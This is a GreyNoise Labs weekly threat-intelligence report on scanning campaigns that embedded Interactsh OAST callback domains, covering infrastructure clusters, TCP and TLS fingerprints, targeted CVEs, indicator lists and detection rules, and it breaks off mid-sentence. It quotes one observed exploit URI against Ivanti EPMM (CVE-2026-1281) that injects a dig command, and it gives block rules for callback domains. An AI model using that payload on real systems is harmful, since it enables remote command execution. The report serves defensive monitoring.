GreyNoise Labs Weekly OAST (Well-known Out-of-band Interaction Domains) Report • Week Ending 2026-02-13

Overview OAST domains appeared across multiple HTTP fields: request bodies (4,331 occurrences, 52.8%), URI paths (1,709, 20.8%), request header values (1,272, 15.5%), URL paths (392, 4.8%), cookies (383, 4.7%), and user-agent strings (122, 1.5%). The distribution across multiple injection vectors indicates automated vulnerability scanning toolkits that embed callback domains into every exploitable parameter. Five Interactsh domain variants were observed: oast.pro (4,182 occurrences across 22 campaigns), oast.live (1,970, 21 campaigns), oast.fun (857, 16 campaigns), oast.me (767, 11 campaigns), and oast.site (433, 13 campaigns). All domains used the standard Interactsh encoding format with campaign, machine_id, PID, and nonce fields. JA4T TCP fingerprint analysis (sourced from raw session data) identified three dominant infrastructure clusters: a Cloudflare proxy signature (MSS 1380, 2,973 sessions), a standard Linux stack (MSS 1460, 1,124 sessions), and an anomalous localhost-like signature (MSS 65495, 1,276 sessions across two window size variants) characteristic of Nuclei and similar scanning frameworks. NOTE: This edition contains a supplemental deep-dive into selected OAST infrastructure components section. Temporal Analysis Activity peaked during the first two days of the observation window, then declined: Day OAST Count Sessions Unique IPs Feb 7 2,757 2,233 18 Feb 8 2,045 1,765 20 Feb 9 566 373 16 Feb 10 1,016 562 37 Feb 11 1,011 781 16 Feb 12 553 362 6 Feb 13 261 121 11 The Feb 7-8 peak corresponds to the dominant ibe4q campaign (Cloudflare-proxied infrastructure). February 10 saw a spike in unique IPs (37) despite moderate session volume, indicating new scanner infrastructure rotating in. Burst analysis identified concentrated activity windows at Feb 8 16:00-17:00 UTC (330+323 sessions) and Feb 11 20:00 UTC (258 sessions), both associated with Oracle Cloud-based scanning. Campaign Analysis The 73 campaigns cluster into distinct operational groups based on infrastructure, timing, and payload overlap. Campaign Group 1: Cloudflare-Proxied Scanning (ibe4q, bjibe) The largest campaign cluster, ibe4q, generated 3,157 OAST domain occurrences across 2,759 sessions from 9 Cloudflare-proxied IPs (AS13335), all geolocated to Brazil. Activity ran from Feb 7 00:00 UTC through Feb 9 05:35 UTC. A related campaign bjibe (238 occurrences, 202 sessions, 8 IPs) operated concurrently from Feb 7-8. Both campaigns share the same machine_id and use all six OAST injection vectors (requestBody, uri, path, requestCookie, requestHeaderValue, useragent), indicating a comprehensive vulnerability scanning toolkit. Top IPs: 104.28.193.87 (1,158 sessions), 104.28.193.83 (418), 104.28.193.82 (379), 104.28.193.84 (277), 104.28.225.85 (262). JA4T fingerprint: 65535_2-4-8-1-3_1380_13 (uniform across all 9 IPs). The MSS 1380 confirms Cloudflare tunnel/proxy traversal. The Cloudflare proxy masks the true origin infrastructure. The Brazilian geolocation likely reflects Cloudflare edge selection rather than attacker location. Campaign Group 2: Oracle Cloud Multi-Campaign Scanners Four Oracle Corporation IPs (AS31898) operated across 13 campaigns with 1,243 total sessions: IP Country Campaigns Sessions Active Period 204.216.147.144 Brazil 5 (37d6c, b7d6c, fhr7d, j7d6c, r7d6c) 591 Feb 8-11 147.224.178.225 United States 4 (3fk04, gt3fk, jfk04, rfk04) 365 Feb 10-11 168.107.59.85 South Korea 1 (c9ndh) 198 Feb 12 144.24.88.37 South Korea 3 (3grt7, 3t7nn, rt7nn) 89 Feb 8-10 GreyNoise first observed 204.216.147.144 on 2024-09-10 (35,367 total hits across 8 sensors), indicating established scanning infrastructure. IP 147.224.178.225 first appeared 2026-02-01 (23,109 hits, 10 sensors) and carries GreyNoise tags for both CVE-2026-1281 (Ivanti EPMM) and CVE-2026-0770. All Oracle IPs used path, requestBody, requestCookie, requestHeaderValue, and uri injection vectors – the broadest payload diversity observed. JA4T fingerprint: Primarily 64240_2-4-8-1-3_1460_7 (standard Linux), consistent across 204.216.147.144, 168.107.59.85, and 144.24.88.37. However, 147.224.178.225 uses both the standard Linux fingerprint (132 sessions) and the Nuclei/loopback fingerprint 65495_2-4-8-1-3_65495_7 (233 sessions), indicating dual-tool deployment – possibly a standard scanner plus Nuclei on the same host. Campaign Group 3: Private Layer / Switzerland (7gveu) A single IP, 179.43.146.42 (AS51852, Private Layer INC, Switzerland), generated 511 OAST domains across 456 sessions in campaign 7gveu, active throughout the entire observation window (Feb 7-13). GreyNoise first observed this IP on 2026-02-03 (43,110 hits across 38 sensors). The sustained, continuous scanning pattern across 7 days suggests automated, unattended operation. All six injection vectors were used. JA4T fingerprint: Primarily 32120_2-4-8-1-3_1460_7 (350 sessions) – a non-standard TCP window size of 32120 that serves as a strong single-actor indicator. This IP also exhibited 65495_2-4-8-1-3_65495_7 (106 sessions), indicating it runs Nuclei alongside a custom scanning tool with a distinctive TCP stack. Campaign Group 4: PROSPERO OOO / Ivanti EPMM Exploitation (f984d, il84d, ito4d, fbg4d) IP 193.24.123.42 (AS200593, PROSPERO OOO, Russia) operated 4 campaigns with 169 sessions between Feb 7-8. This IP stands out for exclusive exploitation of CVE-2026-1281 (Ivanti Endpoint Manager Mobile Code Injection). URI analysis reveals a specific exploit pattern targeting the Ivanti EPMM app store endpoint: /mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue,et=1770526185, h=gPath[`dig > /dev/null`]/39IUqFPJtv5RscnibeX4OUpsHTa.ipa The payload injects a dig command via the gPath parameter to trigger DNS callbacks to OAST domains, confirming command execution. Target IPs in the 38.48.0.0/24 range (GreyNoise sensor space) were systematically enumerated. OAST domains were found only in path and uri fields, consistent with this specific exploit vector. JA4T fingerprint: 65495_2-4-8-1-3_65495_7 (166 sessions) with a secondary 33280_2-4-8-1-3_65495_7 (3 sessions). The MSS 65495 confirms Nuclei-based tooling, consistent with the Interactsh OAST integration. GreyNoise has tracked this IP since 2025-06-12 (147,752 total hits across 2,770 sensors). One additional IP, from AS215730, also triggered the CVE-2026-1281 tag via campaign hag80. Campaign Group 5: AS215540 / GCS LLP (ka1vu, geka1) IP 46.29.235.157 (AS215540, GLOBAL CONNECTIVITY SOLUTIONS LLP, Netherlands) ran 2 campaigns with 287 sessions between Feb 8-9. GreyNoise first observed this IP on 2026-02-08 (9,881 hits, 6 sensors) – appearing in GreyNoise records at the same time as this observation window. The IP shares JA3 fingerprint 11a384388ad36777e1a2e121495037fe with two other IPs (45.138.101.232 and 37.60.230.90), suggesting common scanning tooling. JA4T analysis reveals three distinct TCP fingerprints from this single IP: 64240_2-1-3-1-1-4_1400_8 (165 sessions, primary), 65495_2-4-8-1-3_65495_7 (69 sessions), and 33280_2-4-8-1-3_65495_7 (25 sessions). The primary fingerprint uses non-standard TCP option ordering (2-1-3-1-1-4 vs the Linux default 2-4-8-1-3) and MSS 1400, consistent with a VPN or WireGuard tunnel. The two secondary fingerprints (MSS 65495) indicate concurrent Nuclei deployment. This IP runs at least two distinct scanning tools through different network paths. Campaign Group 6: Vietnamese Infrastructure (p7a5r, 97a5r, mt4kp) Two Vietnamese hosting providers contributed 375 sessions: 103.144.87.192 (AS135932, Viet Storage): campaigns p7a5r and 97a5r, 264 sessions, Feb 9-13. Generated 1,177 unique OAST domains across only 264 sessions – the highest domain-to-session ratio observed, indicating payload reuse or multi-vector injection per session. 103.252.93.81 (AS135918, Viet Digital): campaign mt4kp, 111 sessions, Feb 9-10. OAST domains embedded exclusively in requestBody, consistent with Log4j/deserialization-focused exploitation. Campaign Group 7: Estonian Infrastructure (asgsb) IP 45.138.101.232 (AS41745, Baykov Ilya Sergeevich, Estonia) ran campaign asgsb with 130 sessions on Feb 11. GreyNoise first observed this IP on 2026-02-11 (10,524 hits, 6 sensors) – brand new infrastructure. Shares the JA3 fingerprint with the AS215540 and Contabo IPs. JA4T fingerprint: 64860_2-4-8-1-3_1380_7. The MSS 1380 matches the Cloudflare cluster’s tunnel signature, but the window size (64860) and TTL (7) differ from Cloudflare’s 65535..13. This suggests a different tunnel provider or VPN with similar MTU constraints. The unique JA4T, combined with the shared JA3, indicates the same TLS-layer scanner tool deployed behind a different network tunnel than the AS215540 and Contabo nodes. Payload Analysis GreyNoise tags identified 100+ distinct CVE exploitation techniques across the session data. The top exploitation categories: Category Tag Occurrences Unique IPs Log4j RCE Apache Log4j RCE Attempt 2,131 26 Linux Command Injection Generic Suspicious Linux Command in Request 1,703 54 Ivanti EPMM CVE-2026-1281 RCE Attempt 344 2 XSS Probing Generic XSS Commands in Request 320 25 Fastjson RCE Fastjson RCE Attempt 305 19 Path Traversal Generic Path Traversal Attempt 178 18 Apache OFBiz CVE-2024-32113 Path Traversal 135 7 Apache OFBiz Authentication Bypass Attempt 123 6 Cisco HyperFlex HX RCE Vuln Check 114 30 GPON Router CVE-2018-10561 Router Worm 114 10 XStream RCE Generic XStream RCE Attempt 88 19 Atlassian Confluence CVE-2022-26134 OGNL Injection 78 7 Spring Cloud Gateway Code Injection 73 12 XStream CVE-2021-39152 Input Stream 66 10 Notable CVE targets by recency: CVE-2026-1281 (Ivanti EPMM Code Injection): 344 occurrences, 2 IPs – active exploitation of a 2026 vulnerability CVE-2026-0770: Tagged on IP 147.224.178.225 (Oracle Cloud) CVE-2025-4123 (Grafana Path Traversal XSS): 44 occurrences, 8 IPs CVE-2025-2777/2775/2776 (SysAid On-Prem XXE): 21 occurrences each, 6 IPs CVE-2025-34028 (Commvault Command Center RCE): 21 occurrences, 6 IPs CVE-2025-8943 (Flowise Authentication Bypass RCE): 18 occurrences, 5 IPs CVE-2025-8085 (Ditty WordPress Plugin): 15 occurrences, 3 IPs The payload arsenal spans enterprise software (Oracle WebLogic, SAP, Atlassian, Adobe ColdFusion), network appliances (Cisco, Sophos, Palo Alto, Draytek), IoT/consumer devices (GPON, WAVLINK, D-Link, LG), and emerging AI/ML infrastructure (Ollama, Flowise, Anyscale Ray). Infrastructure Analysis JA4T TCP Fingerprint Clustering JA4T fingerprints extracted from raw session data reveal three distinct TCP stack clusters accounting for 98.6% of OAST sessions: JA4T Fingerprint Window MSS TTL Sessions IPs ASNs Interpretation 65535_2-4-8-1-3_1380_13 65535 1380 13 2,973 9 1 Cloudflare proxy/tunnel 64240_2-4-8-1-3_1460_7 64240 1460 7 1,124 18 10 Standard Linux (cloud VPS) 65495_2-4-8-1-3_65495_7 65495 65495 7 1,082 26 22 Nuclei/loopback scanning 32120_2-4-8-1-3_1460_7 32120 1460 7 350 1 1 Private Layer (custom stack) 33280_2-4-8-1-3_65495_7 33280 65495 7 194 8 8 Nuclei variant (alt window) 64240_2-1-3-1-1-4_1400_8 64240 1400 8 193 1 1 AS215540 primary tool 64860_2-4-8-1-3_1380_7 64860 1380 7 130 1 1 Estonian scanner (tunnel) Cluster 1 – Cloudflare Proxy (MSS 1380, 2,973 sessions): The fingerprint 65535_2-4-8-1-3_1380_13 is exclusive to AS13335 (Cloudflare). The MSS 1380 value (20 bytes below the standard 1400 for tunneled traffic) confirms these sessions traverse a Cloudflare tunnel or Workers proxy. The maximum window size (65535) and TTL of 13 (initial TTL 64 minus ~51 hops through proxy infrastructure) are consistent with Cloudflare’s edge network. All 9 IPs in the 104.28.193.x and 104.28.225.x ranges share this identical fingerprint. Cluster 2 – Standard Linux VPS (MSS 1460, 1,124 sessions): The fingerprint 64240_2-4-8-1-3_1460_7 represents a default Linux TCP stack (window 64240, standard Ethernet MSS 1460, TTL 7 = initial 64 minus ~57 hops). This cluster spans 18 IPs across 10 ASNs including Oracle (AS31898), Contabo (AS51167), and DigitalOcean (AS14061). Key IPs: 204.216.147.144 (Oracle, 591 sessions), 168.107.59.85 (Oracle, 198 sessions), 144.24.88.37 (Oracle, 89 sessions), 37.60.230.90 (Contabo, 87 sessions). The Oracle Cloud IPs all share this fingerprint, supporting their grouping as a single operational cluster. Cluster 3 – Nuclei/Loopback Scanner (MSS 65495, 1,276 sessions): Two fingerprint variants share the anomalous MSS value of 65495: 65495_2-4-8-1-3_65495_7 (1,082 sessions, 26 IPs) and 33280_2-4-8-1-3_65495_7 (194 sessions, 8 IPs). MSS 65495 is the Linux loopback interface MSS (65535 minus 40 bytes TCP/IP overhead), indicating the scanning tool binds to a loopback address or uses a local proxy before egressing. This is a known signature of Nuclei and Interactsh-integrated scanning frameworks. The cluster spans 22 ASNs across 14 countries – the widest geographic distribution of any fingerprint – consistent with a widely deployed open-source tool. Notable MSS 65495 users: 147.224.178.225 (Oracle, US): 233 sessions – uses both standard Linux and Nuclei fingerprints across different campaigns 193.24.123.42 (PROSPERO, Russia): 166 sessions – Ivanti EPMM exploitation 103.144.87.192 (Viet Storage): 135 sessions with MSS 65495, plus 129 sessions with window 33280 variant 179.43.146.42 (Private Layer): 106 sessions (secondary fingerprint alongside its primary 32120 stack) Tor exit nodes (Emerald Onion, Stiftung Erneuerbare Freiheit): tau2 campaigns Multi-Fingerprint IPs: Twelve IPs exhibited multiple JA4T fingerprints, indicating either multiple scanning tools or configuration changes during operation. The most notable is 46.29.235.157 (AS215540) with three distinct fingerprints: 64240_2-1-3-1-1-4_1400_8 (165 sessions, primary tool), 65495_2-4-8-1-3_65495_7 (69 sessions, Nuclei), and 33280_2-4-8-1-3_65495_7 (25 sessions, Nuclei variant). The primary fingerprint uses non-standard TCP options (2-1-3-1-1-4 vs the typical 2-4-8-1-3) and MSS 1400, suggesting a VPN or tunnel endpoint. JA4T + JA4H Combined Clustering Cross-referencing TCP and HTTP fingerprints identifies the tightest infrastructure groupings: JA4T JA4H Sessions IPs ASNs Assessment 65535..1380_13 po11nn06..4ea4093e6290 997 9 1 Cloudflare cluster, POST w/ 6 headers 64240..1460_7 po11nn06..4ea4093e6290 330 5 2 Linux VPS, same HTTP toolkit 65535..1380_13 ge11nn04..532a1ee47909 310 9 1 Cloudflare cluster, GET w/ 4 headers 65495..65495_7 ge11nn04..532a1ee47909 282 14 12 Nuclei, GET variant 65495..65495_7 po11nn06..4ea4093e6290 279 11 11 Nuclei, POST variant The Cloudflare proxy cluster uses both POST-heavy (po11nn06) and GET-heavy (ge11nn04) HTTP patterns but shares a single JA4T fingerprint, confirming a unified origin behind the proxy. The Nuclei cluster uses the same HTTP fingerprint variants but from 22+ different ASNs – the HTTP toolkit is shared but the TCP signature betrays the loopback scanning architecture. Tor Exit Node Cluster (tau2 campaigns) The tau2 campaign family (atau2, itau2, 2tau2, qtau2) operated across 23 sessions from privacy-focused infrastructure: ASN Organization IPs Sessions JA4T Fingerprints AS60729 Stiftung Erneuerbare Freiheit 3 4 3 distinct AS396507 Emerald Onion 3 4 3 distinct AS214503 QuxLabs AB 2 2 2 distinct AS210558 1337 Services GmbH 2 2 2 distinct AS208323 Foundation for Applied Privacy 2 2 1 distinct AS215125 Church of Cyberology 2 2 2 distinct AS399629 BL Networks 1 3 2 distinct AS214209 Internet Magnate (Pty) Ltd 2 3 2 distinct All are known Tor exit node operators or privacy-focused hosting providers. The multiple JA4T fingerprints per ASN reflect the heterogeneous nature of Tor exit infrastructure (each exit node has its own TCP stack). Low session counts per IP (1-2) are consistent with Tor circuit rotation. The tau2 campaigns use MSS 65495 (Nuclei), standard 1460 (Linux), and 1436/1452 (VPN tunnels), indicating the scanning tool runs behind Tor with varying exit paths. JA4H HTTP Fingerprint Clustering The top JA4H fingerprints span multiple JA4T clusters, confirming shared HTTP-layer tooling across distinct network-layer infrastructure: JA4H Fingerprint Unique IPs ASNs Occurrences po11nn060000_4ea4093e6290 28 16 1,933 ge11nn040000_532a1ee47909 36 18 828 po11nn08en00_9cf61e78b7a7 22 11 449 po11nn060000_da66f5d9ff4c 16 10 243 po11nr070000_6b557635aee2 18 7 223 The dominant fingerprint po11nn060000_4ea4093e6290 appeared across 28 IPs in 16 ASNs spanning 12 countries. The po11 prefix indicates HTTP/1.1 POST requests with no cookies or referer. This distribution is consistent with widely deployed scanning tooling (Nuclei or similar frameworks). One JA4H fingerprint, ge11nr17${jn_8062e975b6e7, contains a JNDI injection fragment in the hash – the ${jn prefix indicates Log4j payloads embedded in HTTP headers that propagated into the fingerprint computation. This appeared across 13 IPs in 8 ASNs. Shared JA3 Fingerprint Cluster Three IPs share JA3 fingerprint 11a384388ad36777e1a2e121495037fe: IP ASN Country First Seen Sessions JA4T 46.29.235.157 AS215540 (GCS LLP) Netherlands 2026-02-08 287 3 distinct 45.138.101.232 AS41745 (Baykov) Estonia 2026-02-11 132 64860..1380_7 37.60.230.90 AS51167 (Contabo) France 2026-01-12 87 64240..1460_7 All three IPs appeared in GreyNoise records within the past 5 weeks. The shared JA3 fingerprint across three distinct ASNs suggests a common TLS library and configuration. Despite sharing JA3, their JA4T fingerprints differ: AS215540 uses three TCP stacks (including the unusual 2-1-3-1-1-4 option ordering), Estonia uses MSS 1380 (tunnel), and Contabo uses standard Linux. This indicates the same application-layer tool deployed across different network configurations. ASN Distribution ASN Organization Sessions IPs Campaigns AS13335 Cloudflare, Inc. 2,987 20 5 AS31898 Oracle Corporation 1,243 4 13 AS51852 Private Layer INC 456 1 1 AS215540 Global Connectivity Solutions LLP 287 1 2 AS135932 Viet Storage 264 1 2 AS200593 PROSPERO OOO 169 1 4 AS41745 Baykov Ilya Sergeevich 132 1 1 AS135918 Viet Digital Technology 111 1 1 AS14061 DigitalOcean, LLC 91 9 11 AS51167 Contabo GmbH 87 1 5 PROSPERO OOO (AS200593) is a hosting provider with a documented history of enabling malicious activity. The combination of PROSPERO hosting and exclusive CVE-2026-1281 exploitation represents the most operationally distinct cluster in this dataset. Attribution Assessment Confidence: Low-Medium The data supports identification of distinct operational clusters but not definitive attribution to specific threat actors. What the data shows: At least 5-7 operationally distinct groups based on infrastructure, campaign patterns, and payload focus JA4T fingerprinting strengthens cluster boundaries: three TCP stack families (Cloudflare MSS 1380, standard Linux MSS 1460, Nuclei MSS 65495) cleanly partition the dataset The PROSPERO/Ivanti EPMM cluster is the most clearly differentiated, with exclusive focus on CVE-2026-1281 and a specific dig-based command injection payload, running Nuclei (MSS 65495) Oracle Cloud IPs operate the broadest vulnerability scanning toolkit across the most campaigns (13), with a consistent standard Linux TCP stack (64240_2-4-8-1-3_1460_7), suggesting a scanning-as-a-service or bug bounty automation platform The shared JA3 fingerprint across AS215540/AS41745/Contabo points to common TLS tooling, but divergent JA4T fingerprints reveal different network-layer configurations (VPN tunnel, tunnel MSS 1380, standard Linux) Private Layer IP 179.43.146.42 has a unique JA4T window size (32120) that serves as a high-confidence single-actor tracking identifier 12 IPs exhibited multiple JA4T fingerprints, indicating dual-tool deployment (typically a primary scanner + Nuclei) Cloudflare-proxied infrastructure has a uniform JA4T (65535_2-4-8-1-3_1380_13 across all 9 IPs), consistent with a single origin behind the proxy What remains unknown: Whether the Cloudflare-proxied traffic represents one actor or multiple actors behind a shared proxy (the uniform JA4T suggests a single origin, but Cloudflare normalizes TCP characteristics) The relationship, if any, between Oracle Cloud campaigns (campaign IDs share partial suffixes like 7d6c and fk04, suggesting sequential tool runs from the same operator; uniform JA4T supports single-operator hypothesis) Whether Vietnamese infrastructure represents independent operators or a shared hosting platform (both IPs use MSS 65495 Nuclei fingerprints but with different window sizes, suggesting different host configurations) Network IOCs Primary IPs (by session volume): IP ASN Country Sessions Campaigns GreyNoise Classification 104.28.193.87 AS13335 Brazil 1,158 3 Malicious 204.216.147.144 AS31898 Brazil 591 5 Malicious 179.43.146.42 AS51852 Switzerland 456 1 Malicious 104.28.193.83 AS13335 Brazil 418 2 Malicious 104.28.193.82 AS13335 Brazil 379 2 Malicious 147.224.178.225 AS31898 United States 365 4 Malicious 46.29.235.157 AS215540 Netherlands 287 2 Malicious 103.144.87.192 AS135932 Vietnam 264 2 Malicious 193.24.123.42 AS200593 Russia 169 4 Malicious 45.138.101.232 AS41745 Estonia 132 1 Malicious 103.252.93.81 AS135918 Vietnam 111 1 Malicious 168.107.59.85 AS31898 South Korea 198 1 Malicious 37.60.230.90 AS51167 France 87 5 Malicious OAST Domains/Providers: All domains use the Interactsh OAST platform across five TLDs: *.oast.pro (4,182 occurrences, 22 campaigns) *.oast.live (1,970, 21 campaigns) *.oast.fun (857, 16 campaigns) *.oast.me (767, 11 campaigns) *.oast.site (433, 13 campaigns) JA4T TCP Fingerprints (for detection): 65535_2-4-8-1-3_1380_13 – Cloudflare proxy cluster (2,973 sessions, 9 IPs) 65495_2-4-8-1-3_65495_7 – Nuclei/loopback scanner (1,082 sessions, 26 IPs, 22 ASNs) 33280_2-4-8-1-3_65495_7 – Nuclei variant (194 sessions, 8 IPs) 32120_2-4-8-1-3_1460_7 – Private Layer custom stack (350 sessions, 1 IP) 64240_2-1-3-1-1-4_1400_8 – AS215540 VPN/tunnel tool (193 sessions, 1 IP) 64860_2-4-8-1-3_1380_7 – Estonian tunnel scanner (130 sessions, 1 IP) JA4H HTTP Fingerprints (for detection): po11nn060000_4ea4093e6290_000000000000_000000000000 (1,933 occurrences) ge11nn040000_532a1ee47909_000000000000_000000000000 (828 occurrences) po11nn08en00_9cf61e78b7a7_000000000000_000000000000 (449 occurrences) Shared JA3 Fingerprint: 11a384388ad36777e1a2e121495037fe (used by 46.29.235.157, 45.138.101.232, 37.60.230.90) Detection Recommendations Block or alert on PROSPERO OOO infrastructure (AS200593, specifically 193.24.123.42) – this ASN has a documented history of hosting malicious operations and was observed exclusively targeting CVE-2026-1281. Prioritize patching for CVE-2026-1281 (Ivanti Endpoint Manager Mobile Code Injection) – active exploitation observed with functional dig-based command injection payloads targeting the /mifs/c/appstore/fob/ endpoint. Monitor for Interactsh callback domains (*.oast.pro, *.oast.live, *.oast.fun, *.oast.me, *.oast.site) in DNS logs, HTTP request bodies, URI paths, cookies, headers, and user-agent strings. Alert on the shared JA3 fingerprint 11a384388ad36777e1a2e121495037fe associated with the coordinated scanning cluster across AS215540, AS41745, and Contabo. Detect Nuclei-based scanning via JA4T – MSS 65495 (fingerprints 65495_2-4-8-1-3_65495_7 and 33280_2-4-8-1-3_65495_7) is a high-fidelity indicator of loopback-proxied scanning tools. This signature accounted for 1,276 sessions (20.6%) across 26 IPs and 22 ASNs. Track the Private Layer custom TCP stack – JA4T 32120_2-4-8-1-3_1460_7 (window 32120) is unique to IP 179.43.146.42 and provides a single-actor tracking fingerprint for this sustained 7-day scanner. Review exposure to 2025-2026 CVEs actively targeted: CVE-2025-4123 (Grafana), CVE-2025-2775/2776/2777 (SysAid), CVE-2025-34028 (Commvault), CVE-2025-8943 (Flowise), CVE-2025-61882 (Oracle E-Business Suite). WAF rules: Block requests containing oast.pro, oast.live, oast.fun, oast.me, oast.site in any HTTP field. These domains have no legitimate use in production traffic. Monitor Oracle Cloud ranges (AS31898) for broad vulnerability scanning – 4 IPs operated 13 campaigns across 3 countries, using standard Linux TCP stacks (64240_2-4-8-1-3_1460_7). GNQL Queries Sessions containing OAST callback domains in the past 7 days: tags:"Contains Well-known Out-of-band Interaction Domain" last_seen:7d PROSPERO OOO infrastructure (Ivanti EPMM exploitation): metadata.asn:AS200593 last_seen:7d Oracle Cloud scanning infrastructure: metadata.asn:AS31898 last_seen:7d tags:"Contains Well-known Out-of-band Interaction Domain" Shared JA3 cluster: raw_data.ja3.fingerprint:11a384388ad36777e1a2e121495037fe last_seen:7d CVE-2026-1281 exploitation: tags:"Ivanti Endpoint Manager Mobile Code Injection CVE-2026-1281 RCE Attempt" last_seen:7d AS215540 (new scanning infrastructure): metadata.asn:AS215540 last_seen:7d Supplemental Threat Intelligence Enrichment For Selected OAST Infrastructure VirusTotal + Censys This section layers external threat intelligence from Censys & VirusTotal onto key IPs from the OAST report. 193.24.123.42 (PROSPERO OOO, Russia) - Ivanti EPMM Attacker VirusTotal Classification: 14% malicious detection rate (13/93 engines) Community reputation: 0 (neutral, no votes) Self-signed certificate for www.vvork.com (Hestia Control Panel) Certificate validity: 2025-07-08 to 2026-07-08 2 downloaded files observed (HTML, index.html) Censys Infrastructure: BULLETPROOF hosting label (confidence: 0.75) – Censys classifies this as bulletproof infrastructure resistant to takedown Location: St. Petersburg, Russia (59.9386°N, 30.3141°E) Only 1 service exposed: Port 111 (PORTMAP/TCP) Network creation: 2024-07-03 (recent allocation) WHOIS: PROSPERO OOO, PR-CT SOLIDARITY, D. 12 K. 2 LITERA Z, KV. 167, 193312, ST. PETERSBURG Abuse contact: [email protected] Key Findings: The bulletproof hosting label combined with exclusive CVE-2026-1281 exploitation suggests this is purpose-built attack infrastructure Minimal exposed attack surface (only PORTMAP) indicates operational security awareness Self-signed certificate and Hestia Control Panel suggest web hosting management interface Network registered 6 months before OAST observation window Detection Priority: CRITICAL – bulletproof infrastructure actively exploiting 2026 vulnerabilities 204.216.147.144 (Oracle Corporation, Brazil) VirusTotal Classification: 4.3% malicious detection rate (4/93 engines), 1.1% suspicious (1/93) Community reputation: -1 (1 malicious vote) Resolves to vamflix.ddns.net (dynamic DNS, suspicious) 2 downloaded files: APK Easy Tool v1.60 Portable.zip, light-skin-3.png Censys Infrastructure: Oracle Cloud (AS31898), São Paulo, Brazil No detailed Censys scan available (Oracle Cloud may block external scans) Key Findings: DDNS resolution (vamflix.ddns.net) indicates dynamic/residential IP rotation or home-hosted infrastructure on Oracle Cloud Community malicious vote suggests prior abuse reports 591 OAST sessions across 5 campaigns with broadest payload diversity GreyNoise first observed 2024-09-10 (35,367 total hits, 8 sensors) – established scanning infrastructure Detection Priority: HIGH – Oracle Cloud abuse, established malicious history 179.43.146.42 (Private Layer INC, Switzerland) VirusTotal Classification: 2.2% malicious detection rate (2/93) Community reputation: -1 (1 malicious vote) Certificate for dns.nullsproxy.com (Gandi CA) 5 domain resolutions (all suspicious): aliyundunupdate.xyz (last resolved 2026-02-08) – impersonates Alibaba Cloud security update domain dns.nullsproxy.com lonatersency.com (2015) billerma.com (2015) palablersdown.com (2015) JARM hash: 2ad2ad0002ad2ad00042d42d0000005d86ccb1a0567e012264097a0315d7a7 URLs observed: http://aliyundunupdate.xyz:8084/slt, http://aliyundunupdate.xyz:8084/ Censys Infrastructure: BULLETPROOF hosting label (confidence: 0.75) Location: Bellinzona, Switzerland (registered country: Panama) Reverse DNS: hostedby.privatelayer.com OS: Debian Linux with OpenSSH 10.2p1 4 exposed services: SSH (22): OpenSSH 10.2p1 Debian-3 HTTP (8082): Basic auth protected (“Authorization Required”) HTTP (8084): nginx default welcome page – likely C2 or malware distribution HTTP (8089): Basic auth protected (“Restricted”) JA4T fingerprint (Censys scan): 31856_2-4-8-1-3_1460_7 – standard Debian TCP stack NOTE: Our OAST sessions showed JA4T 32120_2-4-8-1-3_1460_7 (window 32120) – this indicates the scanning tool uses a custom TCP stack modification, not the host’s default stack Key Findings: The aliyundunupdate.xyz domain is a typosquat impersonating Alibaba Cloud (legitimate: aliyundun.com) Multiple historical suspicious domains suggest long-term malicious hosting Nginx default page on port 8084 with no customization indicates rapid deployment Unique TCP window size (32120) is a high-confidence fingerprint for tracking this actor across different IPs Sustained 7-day scanning (Feb 7-13) with 456 sessions indicates automated, unattended operation GreyNoise: 43,110 hits across 38 sensors since 2026-02-03 Detection Priority: HIGH – bulletproof infrastructure with C2 characteristics and typosquatting 46.29.235.157 (AS215540, Global Connectivity Solutions LLP) VirusTotal Classification: 1.1% malicious detection rate (1/93 engines) 98.9% undetected (92/93) No domain resolutions or SSL certificates in VirusTotal Community reputation: 0 Censys Infrastructure: Location: Amsterdam, Netherlands (NOT Denmark as initially reported) Reverse DNS: 40735.ip-ptr.tech OS: pfSense FreeBSD firewall/router 1 exposed service: HTTPS (443): pfSense web GUI login page Self-signed certificate: “pfSense GUI default Self-Signed Certificate” Certificate CN: pfSense-697f5f3d024f3 nginx frontend with PHP backend (PHPSESSID cookie) favicon hash: 5567e9ce23e5549e0fcd7195f3882816 (pfSense default) HTML title: “pfSense - Login” JA4T fingerprint (Censys scan): 65228_2-1-3-4-8_1460_7 TCP options: 2-1-3-4-8 – non-standard ordering (default Linux: 2-4-8-1-3) This matches one of our observed fingerprints (64240_2-1-3-1-1-4_1400_8) with similar non-standard option ordering WHOIS created: 2023-05-10 Key Findings: pfSense firewall suggests this is a router/VPN endpoint for scanning operations, not an end host The self-signed pfSense certificate (default install) indicates minimal operational security Non-standard TCP option ordering (2-1-3-4-8) is a VPN/tunnel artifact – likely WireGuard or similar Our OAST sessions showed 3 distinct JA4T fingerprints from this IP: 64240_2-1-3-1-1-4_1400_8 (165 sessions) – primary tool through VPN 65495_2-4-8-1-3_65495_7 (69 sessions) – Nuclei 33280_2-4-8-1-3_65495_7 (25 sessions) – Nuclei variant This indicates multi-tool deployment through multiple network paths (VPN + local) Shares JA3 fingerprint 11a384388ad36777e1a2e121495037fe with Estonian (45.138.101.232) and Contabo (37.60.230.90) IPs GreyNoise: 9,881 hits across 6 sensors since 2026-02-08 (brand new) Detection Priority: MEDIUM – likely security researcher or bug bounty hunter using pfSense router for scanning 147.224.178.225 (Oracle Corporation, United States) VirusTotal Classification: Not queried individually (token conservation) GreyNoise carries CVE-2026-1281 AND CVE-2026-0770 tags Key Findings from Report: Dual-tool deployment: Uses both standard Linux JA4T (132 sessions) AND Nuclei JA4T (233 sessions) 365 sessions across 4 campaigns (3fk04, gt3fk, jfk04, rfk04) Campaign ID pattern (*fk04) suggests sequential tool runs GreyNoise: 23,109 hits across 10 sensors since 2026-02-01 (very recent) Detection Priority: HIGH – dual exploitation tools, recent infrastructure, 2026 CVE tags 103.144.87.192 (Viet Storage, Vietnam) Key Findings from Report: Highest OAST domain-to-session ratio: 1,177 domains / 264 sessions = 4.46 domains per session This indicates either: Multi-vector payload injection (same session hits multiple fields) Payload template reuse with rotating campaign IDs Campaigns: p7a5r, 97a5r (both Feb 9-13) JA4T: Mixed Nuclei fingerprints (MSS 65495, windows 65495 and 33280) Detection Priority: MEDIUM – high-volume scanner, Log4j focus Shared Infrastructure Patterns JA3 Cluster (3 IPs, shared TLS library): 46.29.235.157 (AS215540, Netherlands/pfSense) - 3 JA4Ts 45.138.101.232 (AS41745, Estonia) - 1 JA4T: 64860..1380_7 (tunnel) 37.60.230.90 (AS51167, Contabo, France) - 1 JA4T: 